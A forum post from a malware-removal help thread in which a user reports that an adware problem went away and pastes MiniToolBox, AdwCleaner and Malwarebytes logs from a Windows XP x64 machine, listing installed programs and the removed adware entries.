#5 74gee

74gee
  • Topic Starter

• Members
  • 3 posts
  •  

Posted 28 February 2015 - 08:01 PM

After the reboot from Adware cleaner the problem has vanished. But I'm posting the logs

MiniToolBox by Farbar  Version: 30-11-2014
Ran by Administrator (administrator) on 01-03-2015 at 08:56:51
Running from "C:\Documents and Settings\Administrator\Desktop"
Microsoft® Windows® XP Professional x64 Edition Service Pack 2 (X64)
Boot Mode: Normal

========================= Flush DNS: ===================================

Windows IP Configuration

Successfully flushed the DNS Resolver Cache.

========================= IE Proxy Settings: ==============================

Proxy is not enabled.
No Proxy Server is set.

"Reset IE Proxy Settings": IE Proxy Settings were reset.

========================= FF Proxy Settings: ==============================

"Reset FF Proxy Settings": Firefox Proxy settings were reset.

========================= Hosts content: =================================

127.0.0.1    mmp
127.0.0.1    localhost

=========================== Installed Programs ============================
µTorrent (HKCU\...\uTorrent) (Version: 3.4.2.32126 - BitTorrent Inc.)
µTorrent (HKCU-x32\...\uTorrent) (Version: 3.4.2.32126 - BitTorrent Inc.)
7-Zip 9.20 (x64 edition) (HKLM\...\{23170F69-40C1-2702-0920-000001000000}) (Version: 9.20.00.0 - Igor Pavlov)
7-Zip 9.20 (x64 edition) (HKLM-x32\...\{23170F69-40C1-2702-0920-000001000000}) (Version: 9.20.00.0 - Igor Pavlov)
AMD Catalyst Install Manager (HKLM\...\{8BC227FA-2476-833F-DBE2-3A0D33447D29}) (Version: 8.0.891.0 - Advanced Micro Devices, Inc.)
AMD Catalyst Install Manager (HKLM-x32\...\{8BC227FA-2476-833F-DBE2-3A0D33447D29}) (Version: 8.0.891.0 - Advanced Micro Devices, Inc.)
ccc-utility64 (Version: 2013.0924.1041.17289 - Advanced Micro Devices, Inc.) Hidden
ccc-utility64 (x32 Version: 2013.0924.1041.17289 - Advanced Micro Devices, Inc.) Hidden
CopyFilenames 3.1 (HKLM\...\CopyFilenames_is1) (Version: 3.1 - ExtraBit Software)
CopyFilenames 3.1 (HKLM-x32\...\CopyFilenames_is1) (Version: 3.1 - ExtraBit Software)
CPUID CPU-Z 1.67 (HKLM\...\CPUID CPU-Z_is1) (Version:  - )
CPUID CPU-Z 1.67 (HKLM-x32\...\CPUID CPU-Z_is1) (Version:  - )
Dropbox (HKCU\...\Dropbox) (Version: 3.2.6 - Dropbox, Inc.)
Dropbox (HKCU-x32\...\Dropbox) (Version: 3.2.6 - Dropbox, Inc.)
Folder Size (64-bit) (HKLM\...\{F24FF688-7138-4CCF-A83F-71E9FB01170E}) (Version: 2.6 - Brio)
Folder Size (64-bit) (HKLM-x32\...\{F24FF688-7138-4CCF-A83F-71E9FB01170E}) (Version: 2.6 - Brio)
GitHub (HKCU\...\5f7eb300e2ea4ebf) (Version: 1.3.1.0 - GitHub, Inc.)
GitHub (HKCU-x32\...\5f7eb300e2ea4ebf) (Version: 1.3.1.0 - GitHub, Inc.)
ImageMagick 6.8.8-1 Q16 (64-bit) (2014-01-01) (HKLM\...\ImageMagick 6.8.8 Q16 (64-bit)_is1) (Version: 6.8.8 - ImageMagick Studio LLC)
ImageMagick 6.8.8-1 Q16 (64-bit) (2014-01-01) (HKLM-x32\...\ImageMagick 6.8.8 Q16 (64-bit)_is1) (Version: 6.8.8 - ImageMagick Studio LLC)
Inky (HKCU\...\Inky) (Version: 1.0 - Arcode Corporation)
Inky (HKCU-x32\...\Inky) (Version: 1.0 - Arcode Corporation)
Java™ 7 Update 5 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F86417005FF}) (Version: 7.0.50 - Oracle)
Java™ 7 Update 5 (64-bit) (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F86417005FF}) (Version: 7.0.50 - Oracle)
Jitsi (HKLM\...\{3F6023C6-A17E-4FC0-845B-8DF7C0685F11}) (Version: 2.6.5390 - Jitsi)
Jitsi (HKLM-x32\...\{3F6023C6-A17E-4FC0-845B-8DF7C0685F11}) (Version: 2.6.5390 - Jitsi)
Link Shell Extension (HKLM\...\HardlinkShellExt) (Version: 3.8.5.1 - Hermann Schinagl)
Link Shell Extension (HKLM-x32\...\HardlinkShellExt) (Version: 3.8.5.1 - Hermann Schinagl)
Microsoft .NET Framework 2.0 Service Pack 2 (HKLM\...\{C09FB3CD-3D0C-3F2D-899A-6A1D67F2073F}) (Version: 2.2.30729 - Microsoft Corporation)
Microsoft .NET Framework 2.0 Service Pack 2 (HKLM-x32\...\{C09FB3CD-3D0C-3F2D-899A-6A1D67F2073F}) (Version: 2.2.30729 - Microsoft Corporation)
Microsoft .NET Framework 3.0 Service Pack 2 (HKLM\...\{A3051CD0-2F64-3813-A88D-B8DCCDE8F8C7}) (Version: 3.2.30729 - Microsoft Corporation)
Microsoft .NET Framework 3.0 Service Pack 2 (HKLM-x32\...\{A3051CD0-2F64-3813-A88D-B8DCCDE8F8C7}) (Version: 3.2.30729 - Microsoft Corporation)
Microsoft .NET Framework 3.5 SP1 (HKLM\...\Microsoft .NET Framework 3.5 SP1) (Version:  - Microsoft Corporation)
Microsoft .NET Framework 3.5 SP1 (HKLM-x32\...\Microsoft .NET Framework 3.5 SP1) (Version:  - Microsoft Corporation)
Microsoft .NET Framework 3.5 SP1 (Version: 3.5.30729 - Microsoft Corporation) Hidden
Microsoft .NET Framework 3.5 SP1 (x32 Version: 3.5.30729 - Microsoft Corporation) Hidden
Microsoft .NET Framework 4 Client Profile (HKLM\...\Microsoft .NET Framework 4 Client Profile) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4 Client Profile (HKLM-x32\...\Microsoft .NET Framework 4 Client Profile) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4 Client Profile (Version: 4.0.30319 - Microsoft Corporation) Hidden
Microsoft .NET Framework 4 Client Profile (x32 Version: 4.0.30319 - Microsoft Corporation) Hidden
Microsoft .NET Framework 4 Extended (HKLM\...\Microsoft .NET Framework 4 Extended) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4 Extended (HKLM-x32\...\Microsoft .NET Framework 4 Extended) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4 Extended (Version: 4.0.30319 - Microsoft Corporation) Hidden
Microsoft .NET Framework 4 Extended (x32 Version: 4.0.30319 - Microsoft Corporation) Hidden
Microsoft Kernel-Mode Driver Framework Feature Pack 1.9 (Version:  - Microsoft Corporation) Hidden
Microsoft Kernel-Mode Driver Framework Feature Pack 1.9 (x32 Version:  - Microsoft Corporation) Hidden
Microsoft Network Monitor 3.4 (HKLM\...\{8C5B5A11-CBF8-451B-B201-77FAB0D0B77D}) (Version: 3.4.2350.0 - Microsoft Corporation)
Microsoft Network Monitor 3.4 (HKLM-x32\...\{8C5B5A11-CBF8-451B-B201-77FAB0D0B77D}) (Version: 3.4.2350.0 - Microsoft Corporation)
Microsoft Network Monitor: NetworkMonitor Parsers 3.4 (HKLM\...\{963E5FEB-1367-46B9-851D-A957F1A3747F}) (Version: 3.4.2350.0 - Microsoft Corporation)
Microsoft Network Monitor: NetworkMonitor Parsers 3.4 (HKLM-x32\...\{963E5FEB-1367-46B9-851D-A957F1A3747F}) (Version: 3.4.2350.0 - Microsoft Corporation)
Microsoft Office Office 64-bit Components 2007 (Version: 12.0.4518.1014 - Microsoft Corporation) Hidden
Microsoft Office Office 64-bit Components 2007 (x32 Version: 12.0.4518.1014 - Microsoft Corporation) Hidden
Microsoft Office Shared 64-bit MUI (English) 2007 (Version: 12.0.4518.1014 - Microsoft Corporation) Hidden
Microsoft Office Shared 64-bit MUI (English) 2007 (x32 Version: 12.0.4518.1014 - Microsoft Corporation) Hidden
Microsoft Office Shared 64-bit Setup Metadata MUI (English) 2007 (Version: 12.0.4518.1014 - Microsoft Corporation) Hidden
Microsoft Office Shared 64-bit Setup Metadata MUI (English) 2007 (x32 Version: 12.0.4518.1014 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM-x32\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.21022 (HKLM\...\{350AA351-21FA-3270-8B7A-835434E766AD}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.21022 (HKLM-x32\...\{350AA351-21FA-3270-8B7A-835434E766AD}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729 (HKLM\...\{14297226-E0A0-3781-8911-E9D529552663}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729 (HKLM-x32\...\{14297226-E0A0-3781-8911-E9D529552663}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM-x32\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM-x32\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM-x32\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.21005 (Version: 12.0.21005 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.21005 (x32 Version: 12.0.21005 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.21005 (Version: 12.0.21005 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.21005 (x32 Version: 12.0.21005 - Microsoft Corporation) Hidden
MSXML 6 Service Pack 2 (KB2758696) (HKLM\...\{E1B33EF1-258C-4EC0-A340-D031100FE50D}) (Version: 6.20.2016.0 - Microsoft Corporation)
MSXML 6 Service Pack 2 (KB2758696) (HKLM-x32\...\{E1B33EF1-258C-4EC0-A340-D031100FE50D}) (Version: 6.20.2016.0 - Microsoft Corporation)
Node.js (HKLM\...\{D8F06AFE-ADFC-4F6B-BBFF-274D78FDD07A}) (Version: 0.10.24 - Joyent, Inc. and other Node contributors)
Node.js (HKLM-x32\...\{D8F06AFE-ADFC-4F6B-BBFF-274D78FDD07A}) (Version: 0.10.24 - Joyent, Inc. and other Node contributors)
Outpost Security Suite 7.1.1 (HKLM\...\Agnitum Outpost Security Suite Free_is1) (Version: 7.1.1 - Agnitum, Ltd.)
Outpost Security Suite 7.1.1 (HKLM-x32\...\Agnitum Outpost Security Suite Free_is1) (Version: 7.1.1 - Agnitum, Ltd.)
PHiSearch version 2.7.1111.2313 (HKLM\...\{50ED5240-7249-4852-9B5C-02BC45EF5703}_is1) (Version: 2.7.1111.2313 - PHiTools)
PHiSearch version 2.7.1111.2313 (HKLM-x32\...\{50ED5240-7249-4852-9B5C-02BC45EF5703}_is1) (Version: 2.7.1111.2313 - PHiTools)
Prio (HKLM\...\Prio) (Version: 2.0.0.2960 - )
Prio (HKLM-x32\...\Prio) (Version: 2.0.0.2960 - )
Process Hacker 2.30 (r5267) (HKLM\...\Process_Hacker2_is1) (Version: 2.30.0.5267 - wj32)
Process Hacker 2.30 (r5267) (HKLM-x32\...\Process_Hacker2_is1) (Version: 2.30.0.5267 - wj32)
Python 3.4.0 (64-bit) (HKLM\...\{863162a8-ecc2-35ea-bdf7-e09ac456e164}) (Version: 3.4.150 - Python Software Foundation)
Python 3.4.0 (64-bit) (HKLM-x32\...\{863162a8-ecc2-35ea-bdf7-e09ac456e164}) (Version: 3.4.150 - Python Software Foundation)
Ruby 2.0.0-p481-x64 (HKCU\...\{B5BD4615-7C8A-4E50-9179-71B593CA6B67}_is1) (Version: 2.0.0-p481 - RubyInstaller Team)
Ruby 2.0.0-p481-x64 (HKCU-x32\...\{B5BD4615-7C8A-4E50-9179-71B593CA6B67}_is1) (Version: 2.0.0-p481 - RubyInstaller Team)
Serviio (HKLM\...\Serviio) (Version:  - )
Serviio (HKLM-x32\...\Serviio) (Version:  - )
Sublime Text 2.0.2 (HKLM\...\Sublime Text 2_is1) (Version:  - )
Sublime Text 2.0.2 (HKLM-x32\...\Sublime Text 2_is1) (Version:  - )
Unlocker 1.9.2 (HKLM\...\Unlocker) (Version: 1.9.2 - Cedrick Collomb)
Unlocker 1.9.2 (HKLM-x32\...\Unlocker) (Version: 1.9.2 - Cedrick Collomb)
Update for Windows XP (KB2607712) (HKLM\...\KB2607712) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB2607712) (HKLM-x32\...\KB2607712) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB2616676-v2) (HKLM\...\KB2616676-v2) (Version: 2 - Microsoft Corporation)
Update for Windows XP (KB2616676-v2) (HKLM-x32\...\KB2616676-v2) (Version: 2 - Microsoft Corporation)
Update for Windows XP (KB2641690-v2) (HKLM\...\KB2641690-v2) (Version: 2 - Microsoft Corporation)
Update for Windows XP (KB2641690-v2) (HKLM-x32\...\KB2641690-v2) (Version: 2 - Microsoft Corporation)
Update for Windows XP (KB2748349) (HKLM\...\KB2748349) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB2748349) (HKLM-x32\...\KB2748349) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB925876) (HKLM\...\KB925876) (Version: 2 - Microsoft Corporation)
Update for Windows XP (KB925876) (HKLM-x32\...\KB925876) (Version: 2 - Microsoft Corporation)
Update for Windows XP (KB927891) (HKLM\...\KB927891) (Version: 5 - Microsoft Corporation)
Update for Windows XP (KB927891) (HKLM-x32\...\KB927891) (Version: 5 - Microsoft Corporation)
Update for Windows XP (KB955839) (HKLM\...\KB955839) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB955839) (HKLM-x32\...\KB955839) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB967715) (HKLM\...\KB967715) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB967715) (HKLM-x32\...\KB967715) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB968389) (HKLM\...\KB968389) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB968389) (HKLM-x32\...\KB968389) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB971029) (HKLM\...\KB971029) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB971029) (HKLM-x32\...\KB971029) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB973815) (HKLM\...\KB973815) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB973815) (HKLM-x32\...\KB973815) (Version: 1 - Microsoft Corporation)
Visual Studio 2012 x64 Redistributables (HKLM\...\{8C775E70-A791-4DA8-BCC3-6AB7136F4484}) (Version: 14.0.0.1 - AVG Technologies)
Visual Studio 2012 x64 Redistributables (HKLM-x32\...\{8C775E70-A791-4DA8-BCC3-6AB7136F4484}) (Version: 14.0.0.1 - AVG Technologies)
Windows Driver Package - SpreadTrum (sprd_enum) USB  (02/28/2011 2.4.0.26) (HKLM\...\0B153FEB163FC170D33C44502B046EFEB618F41B) (Version: 02/28/2011 2.4.0.26 - SpreadTrum)
Windows Driver Package - SpreadTrum (sprd_enum) USB  (02/28/2011 2.4.0.26) (HKLM-x32\...\0B153FEB163FC170D33C44502B046EFEB618F41B) (Version: 02/28/2011 2.4.0.26 - SpreadTrum)
Windows Imaging Component (HKLM\...\WIC) (Version: 3.0.0.0 - Microsoft Corporation)
Windows Imaging Component (HKLM-x32\...\WIC) (Version: 3.0.0.0 - Microsoft Corporation)
Windows XP Service Pack 2 (HKLM\...\Windows x64 Service Pack) (Version: 20070217.000042 - Microsoft Corporation)
Windows XP Service Pack 2 (HKLM-x32\...\Windows x64 Service Pack) (Version: 20070217.000042 - Microsoft Corporation)

**** End of log ****

Problem still existed here

# AdwCleaner v4.111 - Logfile created 01/03/2015 at 08:38:25
# Updated 18/02/2015 by Xplode
# Database : 2015-02-18.3 [Local]
# Operating system : Microsoft Windows XP Service Pack 2 (x64)
# Username : Administrator - MONSTER4
# Running from : C:\Documents and Settings\Administrator\Desktop\adwcleaner_4.111.exe
# Option : Cleaning

***** [ Services ] *****

***** [ Files / Folders ] *****

Folder Deleted : C:\Documents and Settings\Administrator\Local Settings\Application Data\CrashRpt

***** [ Scheduled tasks ] *****

***** [ Shortcuts ] *****

***** [ Registry ] *****

Key Deleted : HKCU\Software\Softonic
Key Deleted : HKCU\Software\rttasks

***** [ Web browsers ] *****

-\\ Internet Explorer v0.0.0.0

-\\ Mozilla Firefox v36.0 (x86 en-US)

[gb9ag8bn.default\prefs.js] - Line Deleted : user_pref("extensions.xpiState", "{\"app-profile\":{\"firebug@software.joehewitt.com\":{\"d\":\"C:\\\\Documents and Settings\\\\Administrator\\\\Application Data\\\\Mozilla\\\\Firefox\\\\Profiles\\\\g[...]

-\\ Google Chrome v40.0.2214.115

[C:\Documents and Settings\Administrator\Local Settings\Application Data\Google\Chrome\User Data\Default\Web Data] - Deleted [Search Provider] : hxxp://search.aol.com/aol/search?q={searchTerms}
[C:\Documents and Settings\Administrator\Local Settings\Application Data\Google\Chrome\User Data\Default\Web Data] - Deleted [Search Provider] : hxxp://en.softonic.com/s/{searchTerms}
[C:\Documents and Settings\Administrator\Local Settings\Application Data\Google\Chrome\User Data\Default\Web Data] - Deleted [Search Provider] : hxxp://en.softonic.com/s/{searchTerms}
[C:\Documents and Settings\Administrator\Local Settings\Application Data\Google\Chrome\User Data\Default\Web Data] - Deleted [Search Provider] : hxxp://www.ask.com/web?q={searchTerms}

AdwCleaner[R0].txt - [6872 bytes] - [06/02/2015 03:38:55]
AdwCleaner[R1].txt - [2169 bytes] - [01/03/2015 08:30:35]
AdwCleaner[S0].txt - [6755 bytes] - [06/02/2015 03:45:36]
AdwCleaner[S1].txt - [2038 bytes] - [01/03/2015 08:38:25]

########## EOF - C:\AdwCleaner\AdwCleaner[S1].txt - [2097  bytes] ##########

Problem vanished here

Malwarebytes Anti-Malware
www.malwarebytes.org

Scan Date: 3/1/2015
Scan Time: 8:47:41 AM
Logfile: log2.txt
Administrator: Yes

Version: 2.00.4.1028
Malware Database: v2015.02.28.06
Rootkit Database: v2015.02.25.01
License: Free
Malware Protection: Disabled
Malicious Website Protection: Disabled
Self-protection: Disabled

CPU: x64
File System: NTFS
User: Administrator

Scan Type: Threat Scan
Result: Completed
Objects Scanned: 391860
Time Elapsed: 26 min, 2 sec

Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled

Processes: 0
(No malicious items detected)

Modules: 0

Registry Keys: 2
PUP.Optional.SpeedDial.A, HKLM\SOFTWARE\CLASSES\SpeedDial.TSpeedDial, Quarantined, [64723ae96a20e551771952c2b251d729],
PUP.Optional.SpeedDial.A, HKLM\SOFTWARE\WOW6432NODE\CLASSES\SpeedDial.TSpeedDial, Quarantined, [3a9c45de870355e17b15ef25dd26a957],

Registry Values: 0

Registry Data: 4
PUM.Disabled.SecurityCenter, HKLM\SOFTWARE\MICROSOFT\SECURITY CENTER|AntiVirusDisableNotify, 1, Good: (0), Bad: (1),Replaced,[a72f82a14545290d42ad389660a5ac54]
PUM.Disabled.SecurityCenter, HKLM\SOFTWARE\MICROSOFT\SECURITY CENTER|FirewallDisableNotify, 1, Good: (0), Bad: (1),Replaced,[17bf70b314769a9cad43ad216a9baf51]
PUM.Disabled.SecurityCenter, HKLM\SOFTWARE\MICROSOFT\SECURITY CENTER|UpdatesDisableNotify, 1, Good: (0), Bad: (1),Replaced,[b521f52e5e2c3bfb28c9f0deec19619f]
PUM.Hijack.StartMenu, HKU\S-1-5-21-3523366793-3309726134-1974054231-500-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\ADVANCED|Start_ShowHelp, 0, Good: (1), Bad: (0),Replaced,[0bcb998af89251e5006b7a56dd28f50b]

Folders: 0

Files: 1
PUP.Optional.Softonic, C:\Documents and Settings\Administrator\My Documents\Downloads\SoftonicDownloader_for_pandora-recovery.exe, Quarantined, [aa2c170c48422a0ccafc1842a45cf907],

Physical Sectors: 0

(end)

Edited by 74gee, 28 February 2015 - 08:23 PM.

0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users